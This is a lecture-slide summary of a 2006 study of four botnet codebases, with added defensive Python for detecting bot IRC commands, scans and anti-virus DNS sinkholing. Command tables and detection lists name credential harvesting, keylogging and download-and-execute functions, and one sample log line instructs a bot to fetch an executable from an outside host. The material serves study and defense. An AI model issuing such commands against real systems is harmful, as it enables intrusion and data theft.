An Inside Look at Botnets By Paul Barford and Vinod Yegneswaran In Series: Advances in Information Security, Springer, 2006 Presented by Jared Bott.

2 Outline
- Why Study Botnets?
- A Brief History of Botnets
- Bot Study
- Findings and Implications
- Analysis of Paper

3 Why?
- Malicious software is a major problem
- The reactive methods that predominate today are ultimately insufficient; proactive methods are required
- Develop a foundational understanding of the mechanisms used by malicious software
- Develop an open repository of malware information

5 Botnets
- A botnet is a collection of compromised computers controlled by their attacker
- Botnets trace their roots to Eggdrop, an IRC bot created for network management by Jeff Fisher in 1993

6 Rise of Botnets
- Motivation for malicious activity is shifting
- Primary motivation has changed from vandalism and demonstration of programming skills to for-profit activities: identity theft, extortion
- Backed by organized crime

7 Botnets Today
- Botnets can be extremely large, with reports of botnets of over 100,000 systems
- Average size appears to be dropping
- Total estimated number of systems used in botnets is in the millions

9 Bot Study Objectives
- Highlight the richness and diversity of bot codebases
- Identify commonalities between codebases
- Consider how knowledge of these botnet mechanisms can lead to the development of more effective defense mechanisms

10 Bot Study
Attributes of bots to analyze:
- Architecture
- Botnet Control Mechanisms
- Host Control Mechanisms
- Propagation Mechanisms
- Target Exploits and Attack Mechanisms
- Malware Delivery Mechanisms
- Obfuscation Methods
- Deception Strategies

11 Bot Study
Four bot codebases:
- Agobot 4.0 pre-release
- SDBot 05b
- SpyBot 1.4
- GT Bot with DCOM

12 Agobot
- AKA Gaobot, Phatbot
- First referenced in October 2002
- Most sophisticated of the four codebases
- Typically around 20,000 lines of C/C++
- Monolithic architecture (a single self-contained codebase), yet internally modular
- Adheres to structured design and software engineering principles: modular structure, standard data structures, code documentation
- Exhibits creativity in design

13 Agobot Components
- IRC-based command and control mechanism
- Large collection of target exploits
- Ability to launch different kinds of DoS attacks
- Modules for shell encodings and limited polymorphism
- Mechanisms to frustrate disassembly by well-known tools

14 Agobot Components
- Ability to harvest the local host for sensitive information, such as PayPal passwords and AOL keys, through traffic sniffing, key logging or searching registry entries
- Mechanisms to defend and fortify compromised systems
- Over 580 variants

15 SDBot
- First referenced in October 2002
- Hundreds of variants
- Fairly simple compared to Agobot: slightly over 2,000 lines of C
- Main source tree does not contain any overtly malicious code modules
- Published under the GPL
- Primarily provides a utilitarian IRC-based command and control system

16 SDBot
- Easy to extend
- A large number of patches (over 80) provide more sophisticated malicious capabilities and diffuse responsibility for them:
  - Scanning
  - DoS attacks
  - Sniffers
  - Information harvesting
  - Encryption routines

17 SpyBot
- First referenced in April 2003
- Hundreds of variants
- Fairly compact, around 3,000 lines of C
- Shares much of SDBot's command and control engine
- No explicit attempt to diffuse accountability

18 SpyBot Capabilities
- NetBIOS, Kuang, Netdevil and KaZaa exploits
- Scanning capabilities
- Modules for launching flooding attacks
- Efficient
- Does not exhibit the modularity or breadth of capabilities of Agobot

19 GT Bot
- AKA Global Threat Bot, Aristotles
- First referenced in April 1998
- Over 100 variants
- Simple design
- Limited set of functions based on the scripting capabilities of mIRC
- Includes the HideWindow program to keep the bot hidden

20 GT Bot
- Includes BNC, a proxy system for anonymity
- Includes psexec.exe to facilitate remote process execution
- Nothing to suggest it was designed to be extensible
- Different versions for specific malicious intents
- The "with DCOM" version includes DCOM exploits

21 Bot Codebases
- Convergence in the set of functions that are available
- Suggests the possibility that defensive systems may eventually be effective across bot families
- Bot codebases are at least somewhat extensible

22 Points of Analysis
- Botnet Control Mechanisms
- Host Control Mechanisms
- Propagation Mechanisms
- Target Exploits and Attack Mechanisms
- Malware Delivery Mechanisms
- Obfuscation Methods
- Deception Strategies

23 Botnet Control Mechanisms
- Command language and control protocols are used to operate botnets remotely after target systems have been compromised
- All analyzed bots base C&C on IRC
- Disruption of this communication can render a botnet useless
- Network operators can sniff for specific commands in IRC traffic and identify compromised systems

24 Botnet Control Mechanisms
Agobot
- C&C system derived from IRC
- Standard IRC is used to establish connections
- IRC plus commands developed for Agobot make up the command language
SDBot
- Command language is a lightweight version of IRC
- Has IRC cloning and spying

25 (Figure) Typical interaction between an SDBot and an IRC server

26 Botnet Control Mechanisms
SpyBot
- Command language is a subset of SDBot's command language
GT Bot
- Simplest command language of the bot families
- Large variations across different versions
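The sniffing approach suggested on slide 23, as an added example (not code from the paper or the presentation): a small Python detector that parses raw IRC lines and flags the bot command names listed in the Agobot, SDBot and SpyBot command tables on slides 30, 32 and 34. The "." / "!" prefix used to address a bot, the two-tier alert logic and the sample capture are assumptions made here.

```python
"""Flag bot command vocabulary in IRC traffic (added example, not from the paper)."""
import re
from dataclasses import dataclass
from typing import List, NamedTuple, Optional

# RFC 1459 line shape: [:prefix] COMMAND params [:trailing]
IRC_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?P<command>\S+)"
    r"(?P<params>(?:\s+[^:\s]\S*)*)(?:\s+:(?P<trailing>.*))?$"
)


class IrcMessage(NamedTuple):
    prefix: Optional[str]
    command: str
    params: List[str]
    trailing: str


def parse_irc_line(raw: str) -> Optional[IrcMessage]:
    m = IRC_RE.match(raw.strip())
    if not m:
        return None
    return IrcMessage(m.group("prefix"), m.group("command").upper(),
                      m.group("params").split(), m.group("trailing") or "")


# Commands specific enough to alert on by themselves (names from the slides' tables).
HIGH = {c: "agobot" for c in (
    "pctrl.kill", "pctrl.list", "pctrl.listsvc", "pctrl.killsvc", "pctrl.killpid",
    "inst.asadd", "inst.asdel", "inst.svcadd", "inst.svcdel",
    "harvest.cdkeys", "harvest.aol", "harvest.registry", "harvest.windowskeys")}
HIGH.update({c: "sdbot" for c in ("sysinfo", "cdkey", "getcdkey")})
HIGH.update({c: "spybot" for c in (
    "listprocesses", "killprocess", "startkeylogger", "stopkeylogger",
    "keyboardlights", "opencmd", "sendkeys")})
HIGH["killthread"] = "sdbot/spybot"
# Plain English words shared with SDBot/SpyBot: only alert once the channel has
# already shown a high-confidence command, to keep false positives down.
LOW = {c: "sdbot/spybot" for c in ("execute", "download", "update")}
LOW.update({c: "spybot" for c in (
    "get", "cmd", "delete", "rename", "makedir", "threads", "reboot",
    "disconnect", "passwords", "cd-rom")})


@dataclass
class Alert:
    line_no: int
    channel: str
    sender: str
    command: str
    family: str
    confidence: str


def scan_irc_log(lines) -> List[Alert]:
    alerts: List[Alert] = []
    hot_channels = set()  # channels where a high-confidence command was seen
    for n, raw in enumerate(lines, 1):
        msg = parse_irc_line(raw)
        if msg is None or msg.command != "PRIVMSG" or not msg.params:
            continue
        channel = msg.params[0]
        words = msg.trailing.split()
        if not words:
            continue
        token = words[0].lstrip(".!").lower()  # assumed bot address prefix
        sender = (msg.prefix or "").split("!")[0]
        if token in HIGH:
            hot_channels.add(channel)
            alerts.append(Alert(n, channel, sender, token, HIGH[token], "high"))
        elif token in LOW and channel in hot_channels:
            alerts.append(Alert(n, channel, sender, token, LOW[token], "low"))
    return alerts


# Constructed sample capture (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
:irc.example.net 001 xgh8s :Welcome to the network
:xgh8s!bot@10.0.0.7 JOIN :#c0ntrol
:c0ntr0ller!op@203.0.113.9 PRIVMSG #c0ntrol :.pctrl.list
:c0ntr0ller!op@203.0.113.9 PRIVMSG #c0ntrol :.harvest.cdkeys
:alice!alice@192.0.2.5 PRIVMSG #linux :get the update from the wiki
:c0ntr0ller!op@203.0.113.9 PRIVMSG #c0ntrol :.update http://203.0.113.9/b.exe 2
PING :irc.example.net
""".splitlines()

if __name__ == "__main__":
    for a in scan_irc_log(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.sender} -> {a.channel} '{a.command}' "
              f"({a.family}, {a.confidence} confidence)")
```

The stateful low-confidence tier matters in practice: "get", "update" and "cmd" appear constantly in legitimate channels, so on their own they are noise; once a channel has carried something as specific as pctrl.list or harvest.cdkeys, those generic words are worth recording as part of the same C&C session.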

28 Host Control Mechanisms
- The mechanisms used by the bot to manipulate a victim host once it has been compromised:
  - Fortify the local system against malicious attacks
  - Disable anti-virus software
  - Harvest sensitive information

29 Host Control Mechanisms
Agobot
- Commands to secure the system
- Broad set of commands to harvest sensitive information
- pctrl commands to list or kill processes running on the host
- inst commands to add or delete autostart entries

30 Agobot Commands
Command               Description
pctrl.list            Return list of all processes
pctrl.kill            Kill specified process set from service file
pctrl.listsvc         Return list of all services that are running
pctrl.killsvc         Delete/stop a specified service
pctrl.killpid         Kill specified process
inst.asadd            Add an autostart entry
inst.asdel            Delete an autostart entry
inst.svcadd           Add a service to the SCM
inst.svcdel           Delete a service from the SCM
harvest.cdkeys        Return a list of CD keys
harvest.emails        Return a list of emails
harvest.emailshttp    Return a list of emails via HTTP
harvest.aol           Return a list of AOL-specific information
harvest.registry      Return registry information for a specific registry path
harvest.windowskeys   Return Windows registry information

31 Host Control Mechanisms
SDBot
- Limited capabilities
- Basic remote execution commands
- Some ability to gather local information
- Auxiliary patches add more capabilities

32 SDBot Commands
Command          Description
sysinfo          List host system information (CPU/RAM/OS and uptime)
execute          Run a specified program with the given parameters (window visibility is 0/1)
cdkey/getcdkey   Return keys of popular games, e.g. Half-Life, Soldier of Fortune
download         Download the specified file and execute it if action is 1
killthread       Kill the specified thread
update           If the bot ID differs from the current one, download the "sdbot executable" and update

33 Host Control Mechanisms
SpyBot
- Similar capabilities to Agobot
- Local file manipulation
- Key logging
- Process/system manipulation, remote command execution

34 SpyBot Commands
Command          Description
listprocesses    Return a list of all running processes
killprocess      Kill the specified process
threads          Return a list of all running threads
killthread       Kill the specified thread
disconnect       Disconnect the bot for the given number of seconds
reboot           Reboot the system
cd-rom           Open/close the CD-ROM tray
opencmd          Start cmd.exe (hidden)
cmd              Send a command to cmd.exe
get              Trigger a DCC send of a file from the bot
update           Update the local copy of the bot code
delete           Delete a specified file
execute          Execute a specified file
rename           Rename a specified file
makedir          Create a specified directory
startkeylogger   Start the on-line keylogger
stopkeylogger    Stop the keylogger
sendkeys         Simulate key presses
keyboardlights   Flash the remote keyboard lights 50 times
passwords        List the RAS passwords on Windows 9x systems

35 Host Control Mechanisms
GT Bot
- Most limited capabilities
- Base capabilities are only gathering local system information and running or deleting local files
- Many versions with more capabilities

37 Propagation Mechanisms
- The mechanisms bots use to search for new host systems
- Traditionally horizontal or vertical scans
  - Horizontal: one port across an address range
  - Vertical: a range of ports on one address

38 Propagation Mechanisms
Agobot
- Relatively simple, essentially vertical and horizontal scanning
SDBot
- No scanning or propagation in the base distribution
- Variants with horizontal and vertical scanning and more complex methods

39 Propagation Mechanisms
SpyBot
- Simple horizontal and vertical scanning
GT Bot
- Simple horizontal and vertical scanning
Due to the simplicity and uniformity of these methods, it may be possible to develop statistical fingerprinting methods to identify scans from botnets
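The fingerprinting idea on slides 37 to 39, as an added example (not code from the paper or the presentation): classify each source in a batch of flow records as a horizontal or vertical scanner from how many distinct destinations and destination ports it touches. The (src, dst, dport) flow format, the thresholds and the sample flows are assumptions made here; the port-to-target names are the well-known ports of the services that Agobot's scanner modules are named after on slide 41, which the page itself does not list.

```python
"""Horizontal vs vertical scan fingerprinting from flow records (added example)."""
from typing import Dict, Iterable, Tuple

Flow = Tuple[str, str, int]  # (source IP, destination IP, destination port)

# Well-known ports of the scanner targets named on slide 41 (assumption: the
# page lists scanner names only, not ports).
TARGET_PORTS = {
    135: "DCOM RPC", 139: "NetBIOS", 445: "NetBIOS/SMB", 1433: "MS-SQL",
    2745: "Bagle backdoor", 3127: "MyDoom backdoor", 6129: "Dameware", 4899: "Radmin",
}


def summarize(flows: Iterable[Flow]) -> Dict[str, dict]:
    """Per source: distinct destinations, distinct ports, flow count."""
    summary: Dict[str, dict] = {}
    for src, dst, dport in flows:
        s = summary.setdefault(src, {"dsts": set(), "ports": set(), "flows": 0})
        s["dsts"].add(dst)
        s["ports"].add(dport)
        s["flows"] += 1
    return summary


def classify(s: dict, min_targets: int = 16, min_ports: int = 16) -> str:
    """Shape of one source's traffic; thresholds are illustrative."""
    n_dst, n_port = len(s["dsts"]), len(s["ports"])
    if n_dst >= min_targets and n_port <= 2:
        return "horizontal"   # one (or two) ports across many addresses
    if n_port >= min_ports and n_dst <= 2:
        return "vertical"     # many ports on one address
    if n_dst >= min_targets and n_port >= min_ports:
        return "mixed"
    return "none"


def scan_report(flows: Iterable[Flow]) -> Dict[str, Tuple[str, str]]:
    """Map each source to (verdict, hint). For a horizontal scan the hint names
    the probed port so the analyst can tie it to a bot's scanner module."""
    report: Dict[str, Tuple[str, str]] = {}
    for src, s in summarize(flows).items():
        verdict = classify(s)
        hint = ""
        if verdict == "horizontal":
            port = sorted(s["ports"])[0]
            hint = f"{TARGET_PORTS.get(port, 'unknown service')} ({port})"
        elif verdict == "vertical":
            hint = f"{len(s['ports'])} ports on {next(iter(s['dsts']))}"
        report[src] = (verdict, hint)
    return report


# Constructed flows: a horizontal DCOM sweep, a vertical probe, and a benign host.
SAMPLE_FLOWS: list = (
    [("10.0.0.7", f"10.1.0.{i}", 135) for i in range(1, 41)]
    + [("10.0.0.9", "10.1.0.5", p) for p in range(1, 31)]
    + [("10.0.0.3", "10.1.0.5", 80), ("10.0.0.3", "10.1.0.6", 443),
       ("10.0.0.3", "10.1.0.7", 53)]
)

if __name__ == "__main__":
    for src, (verdict, hint) in scan_report(SAMPLE_FLOWS).items():
        print(f"{src}: {verdict} {hint}".rstrip())
```

The point the slide makes is that the scanners in these four families are uniform enough that a shape-based rule like this, rather than signatures for each exploit, is enough to separate them from ordinary traffic; the thresholds would be tuned per network, and a real collector would also window the flows in time.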

41 Exploits and Attack Mechanisms
- Specific methods for attacking known vulnerabilities on target systems
Agobot
- Includes an ever-broadening set of exploits:
  - Bagle scanner and MyDoom scanner (for the backdoors those worms leave open)
  - DCOM scanners
  - Dameware scanner
  - NetBIOS scanner
  - Radmin scanner
  - MS-SQL scanner
  - Generic DDoS module

42 Exploits and Attack Mechanisms
SDBot
- No exploits in the standard distribution
- Modules for sending UDP and ICMP packets (DoS)
- Numerous variants with exploits
- Numerous variants with DDoS attack modules

43 Exploits and Attack Mechanisms
SpyBot
- Exploits depend on the version of SpyBot; a wide range of exploits overall
- Evaluated version has attacks on open NetBIOS shares
- DDoS interface closely related to SDBot's: UDP, ICMP, and TCP SYN floods

44 Exploits and Attack Mechanisms
GT Bot
- This variant has RPC-DCOM exploits and simple ICMP floods
- Many variants with many exploits and DoS capabilities
- Bots will likely become more like Agobot, each version having many exploits

46 Malware Delivery Mechanism
- The mechanisms bots use to deliver exploits
- Packers and shell encoders are used to compress and obfuscate code
- SDBot, SpyBot, and GT Bot deliver the exploit and encoded malware in one script
- Agobot separates exploit and delivery:
  - Exploit the vulnerability and open a shell on the remote host
  - Deliver the encoded malware binary over HTTP or FTP
- This lets one encoder be used across exploits, streamlining the codebase and potentially diversifying the resulting bit streams

47 Agobot Delivery (figure)
Attacker computer (bot) to target computer:
1. Send exploit
2. Open shell
3. HTTP/FTP file transfer of the bot

49 Obfuscation Mechanisms
- The mechanisms used to hide the details of what is being transmitted through the network and what arrives for execution on end hosts
- Only Agobot supports any kind of polymorphism

51 Deception Strategies
- The mechanisms used to evade detection once a bot is installed on a target host (e.g. rootkits)
- Only Agobot has elaborate deception mechanisms:
  - Tests for debuggers
  - Tests for VMware
  - Killing anti-virus processes
  - Altering DNS entries of anti-virus software companies to point to localhost
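The last deception item above, as an added example (not code from the paper or the presentation): a check for hosts-file entries that point anti-virus vendor names at loopback or 0.0.0.0, which is the host-side symptom of the DNS tampering the slide describes. The hosts file is the assumed mechanism (the slide only says "DNS entries"), and the vendor watch list and the sample file content are constructed for illustration.

```python
"""Find hosts-file entries that sinkhole anti-virus update domains (added example)."""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Names that legitimately map to loopback and must not be reported.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback",
               "broadcasthost", "ip6-allnodes", "ip6-allrouters"}


def parse_hosts(text: str) -> Iterable[Tuple[int, str, List[str]]]:
    """Yield (line_no, address, hostnames) per entry, skipping blanks and comments."""
    for n, line in enumerate(text.splitlines(), 1):
        body = line.split("#", 1)[0].strip()
        if not body:
            continue
        parts = body.split()
        if len(parts) < 2:
            continue
        yield n, parts[0], parts[1:]


@dataclass
class Finding:
    line_no: int
    address: str
    hostname: str
    on_watch_list: bool


def find_sinkholed(text: str, watch_domains: Iterable[str]) -> List[Finding]:
    """Report every non-local name sent to loopback or 0.0.0.0. Names under a
    watched domain are the case the slide describes; the rest are reported too,
    since a defender should confirm they are intentional (e.g. a dev override)."""
    watch = {d.lower() for d in watch_domains}
    findings: List[Finding] = []
    for n, addr, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue  # malformed address; out of scope for this check
        if not (ip.is_loopback or ip.is_unspecified):
            continue
        for name in names:
            lname = name.lower().rstrip(".")
            if lname in LOCAL_NAMES:
                continue
            watched = any(lname == d or lname.endswith("." + d) for d in watch)
            findings.append(Finding(n, addr, lname, watched))
    return findings


# Illustrative vendor domains; a deployment would carry the organization's own list.
AV_WATCH_LIST = ["symantec.com", "symantecliveupdate.com", "sophos.com",
                 "mcafee.com", "kaspersky.com"]

# Constructed hosts file content (not taken from a real system).
SAMPLE_HOSTS = """\
# constructed sample
127.0.0.1       localhost
::1             localhost ip6-localhost
127.0.0.1       www.symantec.com
127.0.0.1       liveupdate.symantecliveupdate.com   # injected by the bot
0.0.0.0         update.sophos.com
192.0.2.10      intranet.example.net
127.0.0.1       dev.example.test
"""

if __name__ == "__main__":
    for f in find_sinkholed(SAMPLE_HOSTS, AV_WATCH_LIST):
        tag = "AV vendor" if f.on_watch_list else "unlisted"
        print(f"line {f.line_no}: {f.hostname} -> {f.address} [{tag}]")
```

Run against the real file (C:\Windows\System32\drivers\etc\hosts or /etc/hosts) the same logic applies unchanged; a hit on a watched domain is a strong indicator that the host is already compromised, because no update client would configure that itself.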

53 Findings and Implications
Finding: The overall architecture and implementation of botnets is complex and evolving toward the use of common software engineering techniques.
Implication: The regularization of botnet architecture provides insight on potential extensibility and could help to facilitate systematic evaluation of botnet code.

54 Findings and Implications
Finding: The predominant remote control mechanism is IRC and in general includes a rich set of commands.
Implication: Monitoring botnet activity on IRC channels and disruption of specific channels on IRC servers should continue to be an effective defensive strategy for the time being.

55 Findings and Implications
Finding: The host control mechanisms used for harvesting sensitive information from host systems are ingenious and enable data from passwords to mailing lists to credit card numbers to be gathered.
Implication: This is one of the most serious results of the study and suggests design objectives for future operating systems and applications.

56 Findings and Implications
Finding: There is a wide diversity of exploits for infecting target systems, including many of those used by worms that target well-known Microsoft vulnerabilities.
Implication: This is yet more evidence that keeping OS patches up to date is essential, and it informs requirements for network intrusion detection and prevention systems.

57 Findings and Implications
Finding: All botnets include DoS attack capability.
Implication: The specific DoS mechanisms in botnets can inform designs for DoS defense.

58 Findings and Implications
Finding: All botnets include a variety of mechanisms for avoiding detection once installed.
Implication: Development of methods for detecting and disinfecting compromised systems will need to keep pace.

59 Findings and Implications
Finding: Shell encoding and packing mechanisms are common. Polymorphism is found only in Agobot.
Implication: A major focus on methods for detecting polymorphism may not be needed yet, but encodings will continue to present a challenge for defensive systems.

60 Findings and Implications
Finding: Currently there is only a limited set of propagation mechanisms available in botnets.
Implication: The specific propagation methods used in these botnets can form the basis for modeling and simulating botnet propagation.

62 Strengths
- Detailed evaluation of code and capabilities
- Starting point for a malware database; an open database would greatly help defensive capabilities
- Finding commonalities among bots could help create some kind of broad defense

63 Weaknesses
- Dynamic profiling of bots needs to be done
- Too many variants of bots to evaluate each and every one
- Analysis of this kind calls for source code access, which may not be available

64 Improvements
- Dynamic profiling
- Analysis points for other kinds of malware